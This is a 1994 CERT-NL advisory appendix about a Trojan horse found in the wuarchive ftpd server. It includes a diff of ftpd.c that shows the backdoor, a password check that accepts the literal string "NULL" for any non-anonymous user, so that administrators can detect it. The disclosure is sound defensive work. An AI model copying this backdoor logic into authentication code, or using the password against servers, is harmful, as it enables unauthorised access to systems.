============================================================================== Security Advisory CERT-NL ============================================================================== Author/Source : CERT-NL (Don Stikvoort) Index : S-94-08.APPENDIX Distribution : World Page : 1 Classification: Final Version: 1 Subject : wuarchive ftpd Trojan Horse (APPENDIX) Date : 08-Apr-94 ============================================================================== Last Revised: April 7, 1994 This file is a supplement to the CERT-NL Advisory S-94-08 : wuarchive ftpd trojan horse of 07-apr-94 and will be updated as additional information becomes available. Additional Information: The Trojan horse described in CA-94:07 provides a back-door password for any username other than "anonymous". It would be trivial for an intruder to modify the back-door password or other details of the Trojan horse code. The diff below will help you detect only the Trojan horse referenced in CERT's advisory. It will not detect any other Trojan horses. Clarifications: 1) If you have modified any version of the wuarchive ftpd and cannot install the new version, 2.3, you may detect the existence of the discovered Trojan horse with the following diff on ftpd.c: 1013,1015c1013,1014 < if ((pw == NULL || *pw->pw_passwd == '\0' || < strcmp(xpasswd, pw->pw_passwd)) && < (strcmp(passwd, "NULL"))) { --- > if (pw == NULL || *pw->pw_passwd == '\0' || > strcmp(xpasswd, pw->pw_passwd)) { 2) Since the versions containing the Trojan horse were found in a number of locations, it is possible that your version of the wuarchive ftpd software contains the Trojan horse regardless of the distribution site from which you obtained the source code. 3) If you have any questions concerning the wuarchive ftpd software, send mail to: Bryan D. O'Connor Office of the Network Coordinator bryan@fegmania.wustl.edu Washington University in Saint Louis http://fegmania.wustl.edu/~bryan ==============================================================================